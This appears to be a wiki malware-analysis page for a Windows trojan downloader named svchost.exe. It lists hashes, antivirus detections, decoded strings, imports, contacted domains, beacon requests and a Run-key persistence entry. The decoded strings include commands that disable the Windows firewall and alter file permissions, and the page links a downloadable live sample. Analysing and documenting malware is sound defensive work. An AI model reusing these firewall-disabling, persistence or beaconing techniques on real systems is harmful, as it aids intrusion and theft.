E88817fb6dd1b1340e29b73eed09a106
Jump to navigation
Jump to search
Description
Properties
- This malware seems to be compiled with MinGW, a minimalist opensource development environment for Windows.
- It is not packed but contains encoded strings (seems to be base64 encoded)
Identification
| File Name | svchost.exe |
|---|---|
| File Size | 73584 bytes |
| File Type | PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows |
| MD5 | e88817fb6dd1b1340e29b73eed09a106 |
| SHA1 | 285f2aac67b12716502e196345c0f39a970c58db |
| SHA256 | 8ea6b5a35918ec19eeb904e42ddcd294ebfe6116b67f5940e25846ffbbd6fb3a |
| SHA512 | 1d97636a99d64397ba2fc191e55e413d034ea06291b440d7d8ea043385011f456f3904c558ddc70e9233235758a354a37215755fdced6da16527112087ddaa08 |
| CRC32 | 08F89B9E |
| Ssdeep | 1536:0ubvVuG2m44f1SZZxGhjhigsWLNdh+K9FZ:txp2m44AZbGhjDn+8FZ |
Antivirus detection
- Detection rate: 18/50 (2014-01-29 09:59:48 UTC)
- Link: https://www.virustotal.com/fr/file/8ea6b5a35918ec19eeb904e42ddcd294ebfe6116b67f5940e25846ffbbd6fb3a/analysis/
| Antivirus | Detection | Update |
|---|---|---|
| AntiVir | TR/Downloader.Gen | 20140129 |
| Avast | Win32:Malware-gen | 20140129 |
| DrWeb | Trojan.DownLoader9.5410 | 20140129 |
| ESET-NOD32 | a variant of Win32/TrojanDownloader.Agent.AAM | 20140129 |
| Fortinet | W32/Agent.AAM!tr | 20140129 |
| Ikarus | Trojan.Win32.Malex | 20140129 |
| Jiangmin | Trojan/Fsysna.jn | 20140129 |
| Kaspersky | Trojan.Win32.Reconyc.hpf | 20140129 |
| Malwarebytes | Trojan.Malex | 20140129 |
| Microsoft | Trojan:Win32/Malex.gen!E | 20140129 |
| NANO-Antivirus | Trojan.Win32.Fsysna.cqxbss | 20140129 |
| Norman | MadnessPro.A | 20140129 |
| Qihoo-360 | HEUR/Malware.QVM01.Gen | 20140122 |
| Sophos | Mal/Generic-S | 20140129 |
| Symantec | Suspicious.SillyFDC | 20140129 |
| TrendMicro | PAK_Generic.001 | 20140129 |
| TrendMicro-HouseCall | PAK_Generic.001 | 20140129 |
| VBA32 | suspected of Trojan.Downloader.gen.h | 20140128 |
| AVG | 
|
20140129 |
| Ad-Aware |
|
20140129 |
| Agnitum |
|
20140128 |
| AhnLab-V3 |
|
20140128 |
| Antiy-AVL |
|
20140129 |
| Baidu-International |
|
20140129 |
| BitDefender |
|
20140129 |
| Bkav |
|
20140125 |
| ByteHero |
|
20140121 |
| CAT-QuickHeal |
|
20140129 |
| CMC |
|
20140122 |
| ClamAV |
|
20140129 |
| Commtouch |
|
20140129 |
| Comodo |
|
20140129 |
| Emsisoft |
|
20140129 |
| F-Prot |
|
20140129 |
| F-Secure |
|
20140129 |
| GData |
|
20140129 |
| K7AntiVirus |
|
20140128 |
| K7GW |
|
20140128 |
| Kingsoft |
|
20130829 |
| McAfee |
|
20140129 |
| McAfee-GW-Edition |
|
20140129 |
| MicroWorld-eScan |
|
20140129 |
| Panda |
|
20140128 |
| Rising |
|
20140128 |
| SUPERAntiSpyware |
|
20140129 |
| TheHacker |
|
20140128 |
| TotalDefense |
|
20140129 |
| VIPRE |
|
20140129 |
| ViRobot |
|
20140129 |
| nProtect |
|
20140129 |
Static analysis
Strings
The malware contains many strings:
YXBvS0FMaXBsaXM9*WVib2toaGh0*@R0*@Rwc@A6O^ovLy8vLy9kZGRhYWFubm5nZ2*vb29ycnJkZGQuLi5ycnJ1*XUvLy93*3*PT09PT09sbGwvLy9tbW1EREQvLy9paWlubm5kZGRlZWV4e@guLi5wc@BoaGhwc@AxMTFkZGRiYmIwMDAxMTE1NTVo YWI1Y2U2M^I4YTExMDRlN2YwOGRmYmI2NDFkYzliM^A= Z^g0ZTI3ZmUyYzk3MDg0NTA5M2YwM^I4Mzh^ZmEwZGM= NzA0ZDQxMzRmYTJ^MDhkMTc4NDFmND*hZmVkN2Y4OTk= ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ MS4xNg== c3ZjaG9zdC5leGU= TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MS44LjAuNSkgR2Vja28vMjAwNjA3MzEgRmlyZWZveC8xLjUuMC41IEZsb2NrLzAuNy40LjE= TW96aWxsYS81LjAgKFgxMTsgVTsgTGludXggMi40LjItMiBpNTg2OyBlbi1VUzsgbTE4KSBHZWNrby8yMDAxMDEzMSBOZXRzY2FwZTYvNi4wMQ== TW96aWxsYS81LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMjsgVHJpZGVudC80LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wKQ== TW96aWxsYS81LjAgKGNvbXBhdGlibGU7IE1TSUUgOS4wOyBXaW5kb3dzIE5UIDYuMjsgVHJpZGVudC80LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wKQ== TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MC45LjYpIEdlY2tvLzIwMDExMTI4 TW96aWxsYS80LjAgKE1vYmlsZVBob25lIFNDUC01NTAwL1VTLzEuMCkgTmV0RnJvbnQvMy4wIE1NUC8yLjAgKGNvbXBhdGlibGU7IEdvb2dsZWJvdC8yLjE7IGh0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbCk= TW96aWxsYS80LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNi4xOyBubDsgcnY6MS45LjIuMykgR2Vja28vMjAxMDA0MDEgRmlyZWZveC8zLjYuMw== TW96aWxsYS80LjAgKFdpbmRvd3MgTlQgNS4xOyBVOyBlbikgUHJlc3RvLzIuNS4yMiBWZXJzaW9uLzEwLjUw TW96aWxsYS80LjAgR2FsZW9uLzEuMi4wIChYMTE7IExpbnV4IGk2ODY7IFU7KSBHZWNrby8yMDAyMDMyNg== T3BlcmEvMTAuODAgKFN1bk9TIDUuOCBzdW40dTsgVSkgT3BlcmEgMTAuOCBbZW5d dWlkPQ== dmVyPQ== bWs9 b3M9 cnM9 Yz0= cnE9 Y21kIC9jIGVjaG8gWXxDQUNMUyAi IiAvUCAi Ok4i Q0FDTFMgIg== OlIiIC9F YWR2YXBpMzI= Q2hlY2tUb2tlbk1lbWJlcnNoaXA= [8] [7] regini U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cRXhwbG9yZXJcU2hlbGwgRm9sZGVycw== AppData cmd /c " Internet Explorer ProgramFilesDir SOFTWARE\Microsoft\Windows\CurrentVersion \Internet Explorer\iexplore.exe U29mdHdhcmVcc3c= path R0g1Sy1HS0w4LUNQUDQtREUyNA== urlmon URLDownloadToFileA Content-Type: application/x-www-form-urlencoded HTTP/1.1 POST document.cookie= ["cookie"," "realauth= "location"]; GET / HTTP/1.1 Host: User-Agent: Referer: Cookie: Cache-Control: no-cache Connection: Keep-Alive POST / HTTP/1.1 Accept: */* Content-Length: http:// Y2Zh Y21k ZXhl d3Rm ZGVm ZGQx ZGMx ZHMx ZGQy ZGQz ZGQ0 ZGQ1 ZGQ2 ZGQ3 Qzpc U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25c ProductName V2luZG93cyA3 Win07 V2luZG93cyA4 Win08 V2luZG93cyA4LjE= Win81 VmlzdGE= Win_V WFA= WinXP MjAwMA== S2000 MjAwMw== S2003 MjAwOA== S2008 MjAxMw== S2013 YWRt ag== SA== ZA== U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25ccG9saWNpZXNcRXhwbG9yZXJcUnVu SEtFWV9MT0NBTF9NQUNISU5FXFNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXHBvbGljaWVzXEV4cGxvcmVyXFJ1bg== U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu SEtFWV9MT0NBTF9NQUNISU5FXFNvZnR3YXJlXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXFJ1bg== SEtFWV9DVVJSRU5UX1VTRVJcU29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu x86kernel2 bmV0IHN0b3AgTXBzU3Zj c2MgY29uZmlnIE1wc1N2YyBzdGFydD0gZGlzYWJsZWQ= Oio6RW5hYmxlZDo= U1lTVEVNXENvbnRyb2xTZXQwMDFcc2VydmljZXNcU2hhcmVkQWNjZXNzXFBhcmFtZXRlcnNcRmlyZXdhbGxQb2xpY3lcU3RhbmRhcmRQcm9maWxlXEF1dGhvcml6ZWRBcHBsaWNhdGlvbnNcTGlzdA== U1lTVEVNXENvbnRyb2xTZXQwMDJcc2VydmljZXNcU2hhcmVkQWNjZXNzXFBhcmFtZXRlcnNcRmlyZXdhbGxQb2xpY3lcU3RhbmRhcmRQcm9maWxlXEF1dGhvcml6ZWRBcHBsaWNhdGlvbnNcTGlzdA== U1lTVEVNXENvbnRyb2xTZXQwMDNcc2VydmljZXNcU2hhcmVkQWNjZXNzXFBhcmFtZXRlcnNcRmlyZXdhbGxQb2xpY3lcU3RhbmRhcmRQcm9maWxlXEF1dGhvcml6ZWRBcHBsaWNhdGlvbnNcTGlzdA== U1lTVEVNXEN1cnJlbnRDb250cm9sU2V0XFNlcnZpY2VzXFNoYXJlZEFjY2Vzc1xQYXJhbWV0ZXJzXEZpcmV3YWxsUG9saWN5XFN0YW5kYXJkUHJvZmlsZVxBdXRob3JpemVkQXBwbGljYXRpb25zXExpc3Q= -LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32 w32_sharedptr->size == sizeof(W32_EH_SHARED) %s:%u: failed assertion `%s' ../../gcc/gcc/config/i386/w32-shared-ptr.c GetAtomNameA (atom, s, sizeof(s)) != 0 AllocateAndInitializeSid GetUserNameA RegCloseKey RegCreateKeyExA RegOpenKeyA RegQueryValueExA RegSetValueExA AddAtomA CloseHandle CopyFileA CreateDirectoryA CreateFileA CreateMutexA CreateProcessA CreateThread DeleteFileA ExitProcess FindAtomA FreeLibrary GetAtomNameA GetFileAttributesA GetLastError GetModuleFileNameA GetProcAddress GetVolumeInformationA LoadLibraryA SetUnhandledExceptionFilter Sleep WaitForSingleObject WinExec WriteFile lstrcatA lstrlenA _itoa _strlwr __getmainargs __p__environ __p__fmode __set_app_type _cexit _iob _onexit _setmode abort atexit atoi exit fflush fprintf free malloc memcpy memset rand signal sprintf strcat strcmp strcpy strlen strncat EnumWindows GetWindowRect GetWindowTextA SetWindowPos HttpOpenRequestA HttpSendRequestA InternetCloseHandle InternetConnectA InternetOpenA InternetOpenUrlA InternetReadFile WSACleanup WSAStartup closesocket connect gethostbyname htons inet_addr inet_ntoa ioctlsocket recv send sendto socket ADVAPI32.DLL KERNEL32.dll msvcrt.dll msvcrt.dll USER32.dll WININET.DLL WSOCK32.DLL
Some of them are base64 encoded. Once decoded, it provides following additional content:
ÜapoKALiplis=ab5ce6704d4134fa2 1.16 svchost.exe Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060731 Firefox/1.5.0.5 Flock/0.7.4.1 Mozilla/5.0 (X11; U; Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01 Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.6) Gecko/20011128 Mozilla/4.0 (MobilePhone SCP-5500/US/1.0) NetFront/3.0 MMP/2.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html) Mozilla/4.0 (Windows; U; Windows NT 6.1; nl; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 Mozilla/4.0 (Windows NT 5.1; U; en) Presto/2.5.22 Version/10.50 Mozilla/4.0 Galeon/1.2.0 (X11; Linux i686; U;) Gecko/20020326 Opera/10.80 (SunOS 5.8 sun4u; U) Opera 10.8 [en] uid= ver= mk= os= rs= c= rq= cmd /c echo Y|CACLS " " /P " :N" CACLS " :R" /E advapi32 CheckTokenMembership è"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Software\sw GH5K-GKL8-CPP4-DE24 cmd exe wtf def dd1 dc1 ds1 dd2 dd3 dd4 dd5 dd6 dd7 C:\ SOFTWARE\Microsoft\Windows NT\CurrentVersion\ Windows 7 Windows 8 Windows 8.1 Vista XP ×2000 Km42003 Km42008 Km42013 Km5adm SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run Software\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run sc config MpsSvc start= disabled :*:Enabled: SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List SYSTEM\ControlSet003\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
Imports
- ADVAPI32.DLL
- AllocateAndInitializeSid
- GetUserNameA
- RegCloseKey
- RegCreateKeyExA
- RegOpenKeyA
- RegQueryValueExA
- RegSetValueExA
- KERNEL32.dll
- AddAtomA
- CloseHandle
- CopyFileA
- CreateDirectoryA
- CreateFileA
- CreateMutexA
- CreateProcessA
- CreateThread
- DeleteFileA
- ExitProcess
- FindAtomA
- FreeLibrary
- GetAtomNameA
- GetFileAttributesA
- GetLastError
- GetModuleFileNameA
- GetProcAddress
- GetVolumeInformationA
- LoadLibraryA
- SetUnhandledExceptionFilter
- Sleep
- WaitForSingleObject
- WinExec
- WriteFile
- lstrcatA
- lstrlenA
- msvcrt.dll
- _itoa
- _strlwr
- msvcrt.dll
- __getmainargs
- __p__environ
- __p__fmode
- __set_app_type
- _cexit
- _iob
- _onexit
- _setmode
- abort
- atexit
- atoi
- exit
- fflush
- fprintf
- free
- malloc
- memcpy
- memset
- rand
- signal
- sprintf
- strcat
- strcmp
- strcpy
- strlen
- strncat
- USER32.dll
- EnumWindows
- GetWindowRect
- GetWindowTextA
- SetWindowPos
- WININET.DLL
- HttpOpenRequestA
- HttpSendRequestA
- InternetCloseHandle
- InternetConnectA
- InternetOpenA
- InternetOpenUrlA
- InternetReadFile
- WSOCK32.DLL
- WSACleanup
- WSAStartup
- closesocket
- connect
- gethostbyname
- htons
- inet_addr
- inet_ntoa
- ioctlsocket
- recv
- send
- sendto
- socket
Dynamic analysis
Network indicators
Contacted domains
- dangord.ru (81.177.139.243)
- study.mesi.ru (194.85.204.230)
Requests
GET /wOOl/mD/index.php?uid=01591718&ver=1.16&mk=1db015&os=WinXP&rs=adm&c=1&rq=0 HTTP/1.1 Host: dangord.ru User-Agent: Mozilla/5.0 (X11; U; Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01 Cache-Control: no-cache Connection: Keep-Alive
POST /gst/default.aspx HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: study.mesi.ru
Content-Length: 44
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: {8279c7f1-b2ed-458e-805e-88494272c901}
Cache-Control: no-cache
Connection: Keep-Alive
login=studmskk_12_dsmihalin&password=u4jeD17
Process activity
- svchost.exe
- cmd.exe
- cmd.exe
- cacls.exe
- CACLS.exe
- cmd.exe
- cmd.exe
- cacls.exe
- CACLS.exe
- svchost.exe
- regini.exe
- regini.exe
- regini.exe
- regini.exe
- cmd.exe
Registry keys
The malware creates a persistence registry key in:
- Key: HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run
- Name: "x86kernel2"
- Type: REG_SZ
- Value: c:\users\username\appdata\roaming\03926344\svchost.exe
Links
| Download sample (pass: infected) | https://www.dropbox.com/s/0do9lgywcz63d4d/e88817fb6dd1b1340e29b73eed09a106.zip (pass: infected) |
|---|---|
| Virustotal | https://www.virustotal.com/fr/file/8ea6b5a35918ec19eeb904e42ddcd294ebfe6116b67f5940e25846ffbbd6fb3a/analysis/ |
| Malwr sandbox analysis | https://malwr.com/analysis/MTY2MGQzMTI3ZjhhNGJlZmJiZDc4N2FlZWUwMmY1OTc/ |